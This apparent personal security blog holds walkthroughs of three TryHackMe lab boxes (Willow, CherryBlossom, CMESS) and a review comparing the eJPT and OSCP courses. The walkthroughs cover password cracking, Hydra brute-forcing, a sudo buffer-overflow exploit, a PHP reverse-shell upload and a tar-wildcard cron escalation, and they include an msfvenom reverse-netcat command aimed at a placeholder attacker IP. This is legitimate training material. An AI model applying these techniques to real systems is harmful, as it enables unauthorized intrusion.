Here we’re going to go through another box called Willow created by the amazing MuirlandOracle. Knowing this is one of his creations and having done his boxes in the past we can expect some encryption challenges and constant bumps in the road haha lets get in to it.
L3ts G3t $h3ll
Initial nmap scans shows the following ports open.
22 for SSH 80 for HTTP 111 for RPC bind 2049 for network file share
So let take a look at HTTP and see whats going on there.
Seems to be for now a huge string of random numbers, lets dig a little further in the other ports and see if we can find something that might give us a clue to what this is. Lets take a look at the NFS (Network File Share).
showmount -e <ipaddress>
Looking at the network file share it seems someone is sharing their /var/failsafe * folder. So lets mount this and take a look.
Looks to be the something to do with RSA key pairs so maybe that gives us a clue to whats on the web page.
Also note “Recovery Page” in title here
Lets see if we can work out what this is and decrypt it.
Putting this through CyberChef and using the SSH parser module we manage to decrypt this message and see a note about it being a SSH private key.
"Key type: Willow, here's your SSH Private key -- you know where the decryption key is!"
So I imagine where they’re saying “you know where the decryption” key is, it will be the things we found on the NFS to help us. Lets now use a RSA Calculator to work out and decrypt the encrypted message.
It should also be noted that MuirlandOracle has given his great explanation on RSA key generation and down at the bottom in the example scripts we can see that the E, N and D values are spat out. We have these values from the NFS.
Retrieved Private SSH Key
Great lets see if can save this and use it now!
Of course its never that fucking easy! however we can use our good old friend JohnTheRipper to convert this key in to a hash value and see if we can crack it!
Cracking time, again with john and using the rockyou wordlist.
Great we have the password so now lets try to SSH to the box again and see if we get in!
WERE IN!
Lets grab that user flag now we have our SSH shell on the box with Willow user.
RIGHT! of course theres always that extra step, right lets base64 this picture and transfer output to my box and decode it.
cat user.jpg | base64
Now take all that output from the above command and put it inside a file, I put it inside one I created called “user.b64” then cat’d and decoded that file and outputted it in to user.jpg.
cat user.b64 | base64 -d > user.jpg
We got user flag
Awesome we have our user flag!
L3t5 G3t r00t
Okay lets take a look around and see what we got to work with to get root.
Above we did the same procedure, but this time for getting the LinEnum script over to the box. Lets run LinEnum script now and sieve through the results.
Hmm okay lets make note that we can run /bin/mount command as root with no password, this might give us a hint to where we need to look.
If we look in the /dev file this is normally where devices or filesystems show up and then we would need to mount it to our directory tree somewhere.
a secret path
So with that and knowing we can run mount command as sudo lets try and mount this partition on to /mnt/creds.
Now lets take a look inside the partion and see if we find anything useful
OH YEAH CREDS!!!!
Amazing we have the root and Willow users passwords. lets switch users to the root and get that root flag.
Again another roadblock! well lets now try and work this out. We have the root password and the willow password but what does “I gave you the root flag some time ago” mean? hmmm…
OF COURSE!!!!
That little sneaky bastard I bet has hid something in the user.jpg! okay lets see if we can extract it using steghide.
sneaky sneaky sneaky!root flag!
ROOOOOOOOT!!
Thanks again MuirlandOracle for another interesting, and infuriating box haha hope you all learnt something from this box 🙂
This is my walkthrough on how I did the CherryBlossom box on tryhackme.com. It was an amazing box and fair play to the creator for this one, a very smart guy known only as MuirlandOracle.
This box consists of multiple layers of stegonography which eventually leads you to a journal/diary from which you find information that leads you to a shell on the box, then lateral movement to another user and finally rooting the box. It was painstaking work and not for the fainthearted 🙂 enjoy the read.
Warning: most filenames have been either changed in the screenshots or blurred to encourage you to go find these things yourself 😉
L3t’s G3t A $h3ll
First things first we need to do nmap scan of the box.
Nmap shows us that we have ports 22 SSH, 139 and 445 for Samba open, lets start enumerating the samba services using enum4linux.
enum4linux -a <ipaddress>
Cool we found an open share, now lets flick over to another tool for further enumeration on smb called smbmap, this will try to list shares and its contents if reable.
smbmap -H <ipaddress>
Great, we found within that share a .txt file so lets use smbmap to download it.
Okay so lets take a look in to this file and see what it is and see if we have anything juicy within.
By the looks of it, it just seems to be base64 so lets decode it and see what we get from it.
cat <file> | base64 -d > decoded.b64
Now we have something that looks like a PNG file so lets take a look.
hmmm just a picture of cherry blossom so lets do a little more digging in to the picture and see whats going on, for this im going to start using a toolkit called stego-toolkit and it can be found here.
Not going to give a full walkthrough on how this tool works as there is quite a few online but you can run either check_png.sh <filename> or check_jpg.sh <filename> and it will run a series of checks against your file. Here I used check_png.sh decoded.b64.
The thing that raised my suspicions about this picture having something to hide was the file was 2.5MB large and another tool called zsteg kept finding “Secret” stuff within. Dont believe everything you see from one tool make sure to use 2 or 3 different ones.
zsteg output
Lets try and use another tool within this toolkit to extract anything from the picture, here we use stegpy <filename>.
Great, so we have extracted a zip file so lets take a look at this now (name of file was changed)
Hmm thats odd this zip is telling us its another picture. lets try and unzip it.
This time we get an error about the files header signature, so lets take a closer look at the hex and see whats going on, for this I used an awesome online tool called HexEd.it – Great little tool.
Okay we have a .ctz (cherrytree filename) within a zip file that is using JPEG magic byte numbers, this sounds confusing and it is, but basically magic byte numbers OR file signatures, are a unique set of numbers that identifies what type of file something is. For a list of singature numbers go here – File Signatures.
JPEG’s signature is “FF D8 FF D8”
lets change these JPEG signatures to be that of a ZIP file, ill let you hunt out the signatures for that 😉 .
Should look like a ZIP now.
Now lets export this and try and unzip it again and see if it works.
Okay great, we get asked for a password to extract this new mystery .ctz file.
Lets use another tool in stego-toolkit called fcrackzip that is a password attacker for ZIP files and lets see if we can get a password for our zipped file.
Amazing we have a password so now lets unzip this password protected file, and see what comes out.
Great we have ourselves a .ctz file which is a CherryTree file that has been zipped and password protected (I renamed the file to diary.ctz).
So with it being a 7-zip file we can use JTR (JohnTheRipper) to convert this for us in to a hash for a bit of a hash cracking session 😀 like we havent done enough at this stage!
Thats a little small to see but I’m running 7z2john against our diary.ctz and its throwing us an error and saying we’re missing a module, lets see if we can find this module and install it. *Skipping 15 mins of searching here for module*.
Okay great so running that again with our new module installed, we get a great big dirty SHA256 hash that we will store in a file called “hash” original I know. Time to crack the hash, we are going to use john for this and the rockyou.txt wordlist.
Password retrieved lets see if we can now open this password protected cherrytree file using CherryTree.
Cool so we have a diary with a few entries, I wont spoil anything here for anyone, but I’ll let you read through it. In one of the entries we find the journal flag.
FIRST FLAG!
The important part here is that we get a few potential usernames including person’s girlfriend. He later talks in his diary about how his got a list of unique passwords he created and how he has chosen one and his girlfriend has chosen one so that’s 2 passwords from the list that is now used. Password lists were in the diary as well as an attached file. I wont tell you which one I used.
With that information lets see if we can hydra our way in to his girlfriends account as we see her username and we dont know the other persons name yet as they refer to themselves with their intial. We see this by looking at the diary entries.
Hydra is a great tool for bruteforcing a range of logins and more! Here we are using it with the girlfriend as the username, a password list, -V for verbosity and see every login attempt, -f to stop the attack upon first successful login, -e ns to try the username and blank password as a password.
SUCCESS!!!
Lets try and SSH in and see what we get.
Great we have our intial shell on the target machine 😀 BUT not user as no user flag yet 😦 more digging…
L4ter4l M0v3MenT
Now our next step is going to be a lateral move across to the boyfriend who is the owner of the diary and a user on the box.
Lets upload our favourite tool Linpeas using a another tool I have grown to love and has replaced the good old “python SimpleHTTPServer” module called updog. Kick that off and see what we find. updog is amazing! I highly suggest go checking it out!
With that running we can now do a wget of our linpeas script on the ssh shell we have.
getting linpeas, easy as that.
After some very deep looking we find an interesting file in our linpeas results.
Lets go take a look at that and see what we find.
Great we found some hashes including the boyfriends hash, lets see if we can crack one of them as we already have the password to the other girlfriends account.
Using hashcat we can start cracking our hash using the following:
-m specifies the hash type we are cracking -o is the outfile name to put a password if cracked -O is to optimize the cracking
If you find it taking a while to crack try to remember something from the diary.
Eventually, password cracks and now we can try loggin in via SSH to this user.
That failed, maybe its because SSH login is not permitted for this user so lets go back to the girlfriends shell and try switching user.
su <username>
simple “su <username” seemed to work just fine, and we get user flag.
L3t’s G3t R00t
Okay now lets copy the Linpeas script over to this user and run it as him and see if he has anything cool to find.
After some more digging we find we should try “sudo -l” and see what we can run as root user. This is one of the first things you should try when you get access, its always nice to find easy wins.
Thats strange, we should’nt be getting the password echo’ed back to us this is a function called pwfeedback thats enabled in the /etc/sudoers config, more about it her CVE-2019-18634. Basically a stack buffer overflow in this version.
Git clone the file down, and then compile the code with gcc by running the following
gcc exploit.c -o exploit
Updog this exploit now to the box and run it.
!!!ROOT!!!
Hope you enjoyed it as much as I did, very frustrating but fun and rewarding and learnt loads! thanks again MuirlandOracle for the box it was truly a great experience!
This is going to be a simple walkthrough on how I did CMESS box on TryHackMe.com. The privilege escalation demonstartes a really good use of wildcard exploitation. The creator of the box is Optional and thank you to him for creating an awesome fun box.
Let’s g3t 4 Sh3ll
First things first we’re told to add the hostname to our /etc/hosts file.
So kicking off the box with an nmap scan we see only ports 80 and 22 open.
Heading over to port 80 we see a simple and pretty empty home page.
Running gobuster on the site gives us quite a few entries back.
As well as directories we should always enumerate for any subdomains, for that i used a tool called wfuzz.
Here we see that we got a subdomain back, so add this entry in to the hosts file also, so we can browse to it.
Upon going to our new found subdomain we see a conversation between the user, andre and support. These are both email address or possible usernames we could use in the future so make note of these.
We also see that support user has reset andre’s password so lets take that and see if we can use it anywhere. looking back at our gobuster output we can see we have a /admin directory. Lets take a look.
We find a login page that takes an email and a password, these we have so lets try it.
And we get logged in. Straight away we see a “Gila CMS version” so lets take a look if there’s any exploits for it.
Searchsploit shows that there is a LFI or Local File Inclusion for this version so lets take a look using
searchsploit -x <exploit-path>
Lets see if we can use the last bit of this url in the CMS we have access to and see if it returns anything.
Append this to the end of our URL.
Okay great! we see we have some type of directory listing now with some upload functionaly so lets see if we can upload a shell.
We manage to upload a payload which goes in to the “assets” directory. Lets start listener and then browse to http://cmess.thm/assets/php-reverse-shell.phpto get the server to process the payload.
Awesome we have a shell as www-data. Looking around we see we cant get in to the andre directory, so our next step is lateral movement to andre.
Lat3ral m0ve to Andre u5er…
Lets head over to the /tmp directory and grab linenum.sh and see what we can do as www-data user and maybe see if we can find anything interesting.
Grab the linenum.sh file“python3 -m http.server” to serve the request for “le.sh” (linenum.sh)
Kicking this off with “./le.sh -t”. The “-t” is for thorough testing, we then see in the results some interesting files lurking about.
This looks interesting so lets take a look.
Awesome we found a password!! lets see if we can now SSH to the box as andre 😀
Awesome lets grab user.txt while we’re here 🙂
L3ts g3t R00T!
Nice we got user!! lets repeat the linenum process and see if we can do anything else new. However this time im going to use an “upgraded” version of LinEnum called LinPeas. This does the same thing as linenum and some more…
Linpeas has a wicked awesome colour scheme for quickly hunting out privelege escalation points! so lets begin the hunt.
Looking in to our results from linpeas we see that its flagged a cronjob that runs as root every 2 mins.
This job is running a tar command to backup the andre users “backup” directory and everything in it.
we need to create 2 directories and a shell.sh file inside /home/andre/backup directory that tar will see and interpret it as commands and execute. SUCKAA!
msfvenom -p cmd/unix/reverse_netcat lhost=ATTACKER-IPADDRESS lport=ATTACKER-PORT R
Msfvenom to create a payload
Start our listener for this payload
Head over to the directory thats going to be backed up by tar, we see a little note.
lets now echo our payload in to “shell.sh” and create the 2 directories needed for this exploit.
Now we wait for the cron job to run and we should get tar interpret them commands and execute our shell.sh file.
run “date” to see the systems time
Woop Woop we got our shell back from the box!
This was a great box and really demonstrated the issues behind using wildcard’s in automated jobs or scripts, and how a hacker can leverage these vulnerabilies to gain higher privileges.
I have seen a lot of conversation about the difference in both these providers of penetration testing courses or hacking courses. So below I’m going to give you my run down of the 2. Also I’m stating now that I aint the best at spelling and grammar so dont be a fuck-tard and start correcting my shit, just read and get on with it!
Now I just want to let you know I have my OSCP Certificate and my eJPT (Junior Penetration Tester) certificate and have bought but not completed the ELearnSecurity PTP cource. So from here on I speak about my opinions, of which are my own, and my experience with both of these.
So if you’re new to the Cyber Security world and you wanna become a fu*king hacker baby! then you would’ve definitely have googled “how to become a hacker”, “how do I start in penetration testing” or “does my cat secretly watch me while I sleep”. Okay maybe not that last one, but yeah the other two. I know I did when I first started, and right now you’ll get lots of different results and thats how you might of even ended up here. Eventually you’ll work out that you need to get OSCP and maybe some other certificates or qualifications but you tend to always read “OSCP is a must, to get a job in Cyber security”. Then you realize that OSCP is a bit f*cking mental and probably for the 1337 wannabe hackers, so you start looking around for courses in penetration testing and hacking and you’ll find this company called ELearnSecurity, which deliver complete beginner courses in penetration testing. So lets go in to that and talk differences about ELearnSecurity’s PTS (Penetration Testing Student) source and OSCP.
ELearnSecurity
So ELearnSecurity is first of all amazing, it really is. Head over to their website and check out the courses they provide. When I did this exactly 2 years ago today I found myself really interested in the PTS course (Penetration Testing Student) which was their course for people with NO EXPERIENCE AT ALL!!! So I bought it, and got started!
Looking at the syllabus I felt pretty confident I could jump in to this and invest a few hours a day learning their powerpoint style material and the videos at the end of each section drilling in everything you learnt in utter detail!
PTS Syllabus
The course takes you through a very structured way of learning, it teaches you all the basics you need to know like NMAP scans and different flags to use, what and how XSS scripts and SQL Injections work, how to exploit SMB attacks and many more. Each section generally teaches you a subject and then finishes it with a video or 2 about it, where the instructor shows you step by step what you just learned in the slides, this method of teaching is really good and really drove home certain points you need to remember. Then once you have learnt that section, lets say on NMAP it then gets you to start the “NMAP Lab” where you will then open the challenges for that lab and it will ask you something like “What ports are open on the 3 computers in the network” and then you put to test everything you learned from that NMAP section. Below is a list of labs from PTSv3! I think they’re on V5 now but as far as im aware not to much has changed just some more stuff added, when you buy the course you will get the latest and greatest version.
PTSv3 Labs
There sh*t is structured, nice and just damn right sexy. It will take you from an absolute n00bian and give you those foundations you will need to start enumerating shit and hacking things. It gives you enough experience that once completed you can start jumping on the active boxes in HTB or smash your way through the labs/VM’s in Vulnhub.
EXAM TIME. Once you have finished all the course material, the videos, and then completed all the labs (do them twice over). You will have to do your exam the eJPT exam, to test your new powers! Now the exam is good fun, here you will be presented with a domain network style pentest and have to hack your way through like 10 computers and 3 servers to answer questions that get given to you at the beginning. If I remember rightly there are about 20 questions ranging from things you will find in this domain network testy environment exam thingy and you have 3 days to complete this exam! Now honestly it took me around 8 hours to do the whole thing, and I was a NOOB! thats not to say its easy though!…
Once completed, and you submit your answers and you feel you have done and got everything you need you will hit that big fuc*ing submit button and wait, after a while the page will load up and it will tell you if you have passed or failed. Honestly its a beginner course and it will deffo teach you everything you need to know in order to pass and get your feet wet in the real world!
ELearnSecurity Recap:
Online course available 24/7.
Powerpoint type presentations.
Multiple Videos for each sections.
Individual labs for end of every section.
3 Day Question based exam on domain network (more than enough time).
OSCP
Right where do I start with OSCP, there are a lot of reviews and blogs out there for this one so I will go over my findings of the course. OSCP is Offensive Security Certified Professional its considered the 31337 course and exam to prove to oneself that you’re a hacker/penetration tester. In order to become OSCP certified you will need to do their PWK course and pass the exam, details on that are here.
So I started my OSCP journey back in august 2018 and passed in February 2019, I’m not going to bore you with the details as the actual journey and write up can be found here. I will however tell you how its structured!
When you buy OSCP you will start it on the 2nd Sunday from the day you bought the course, I’m sure thats how it works. On day one you will get an email with all the course material and connection packages (VPN files) to get started.
Now when you have download all this you will have a folder called “oscp-pwk” or something along those lines and inside there are your ~350 page PDF manual and all the training videos. You open up the video training and it will look like the below.
OSCP Videos
You will be shown everything from netcat listeners to reverse shells, from exploiting SQL injections to privilege escalation and gaining root. Once you’ve gone through all the PDF and videos that they provide, which took me about a week, you will then VPN to the labs. once in you’re faced with a big domain network and left to do what you want, you’re free to go explore and hack your way through their network as long as you follow a couple rules and respect others that might be using or have used a box. I advise giving a box a reset before you jump on it! Below is a map of their network, you will start in the “Student Labs, Public Network” and hack your way through and pivot your way to other networks with the goal being admin department!
Now Offensive Security throughout their training will give you JUST enough information to get you started on boxes and then leave you to find the answers for yourself! For example they will show you what things to look for when hacking a web app on a server, but it will be up to you to find out how to hack the stuff on the website like the E-commerce shop on there or how to hack the actual web server the web app sits on.
With OSCP you will find yourselves in Google a lot searching up exploits for certain versions of things or finding out how to privilege escalate a Windows/Linux computer. You will also find yourself in Exploit-DB a lot which is basically, in short, a library of exploits for all sorts of things! and sometimes you will have to make changes to them exploits!
The Exam is basically 5 computers separate from each other, and all have their own unique ways of being pwned, you have to pwn it and get a shell and then root/admin it to get full points for it. Each of the 5 boxes are point based and you have to get 70 POINTS OUT OF 100 WITHIN 24 HOURS TO WIN! Below is a quick look at what boxes are worth, points wise.
25 point box ( Buffer Over Flow )
25 point box
20 point box
20 point box
10 point box
Therefore its up to you how you tackle this and get your points! BUT thats not the end! once you’ve got all your points you will then need to WRITE A REPORT WITHIN 24HRS! and this is all back to back so from the moment you start your exam you have basically 48 hours to hack sh*t up and get a report back to Offensive Security, then takes a couple days to get your results! You best make sure you report is shit hot cause they can and will fail you for spelling or grammar mistakes!!! Sh*t they will fail you for sending them the report unencrypted, but dont worry you will be told how to do this when the time comes!
OSCP Recap:
~350 page PDF Manual.
Offline Video led training.
24/7 access to domain network lab.
Offensive Security show only enough to get you started.
A lot you learn as you go through labs and research.
24hr Practical Exam.
24hr Report Writing.
Conclusion
If your starting your journey in to Cyber Security and you wanna become a f*cking awesome hacker and you dont know where to start then head over to ELearnSecurity and do their PTS (Penetration Testing Student) course, then once completed jump on OSCP, skip their PTP (Penetration Testing Professional) course as you wont need it to pass OSCP! OSCP will teach you enough to pass their exam if you go in to it knowing the foundations of hacking.
If your already hacking things and know your way around enumeration a bit and can comfortably exploit things and get shellz then skip ELearn’s PTS and jump straight on to OSCP and start bashing away at that. OSCP will take you from foundation knowledge to advanced and get you hacking away even better than you was.
Remember that OSCP is also a beginner course, this is something a lot of people forget and they do provide some mega good training, but after that your left to do your own research and exploitation.
Any questions let me know… Hope you enjoyed!
and for those out there now doing your OSCP or eJPT exam then I say this to you!
The Norseman 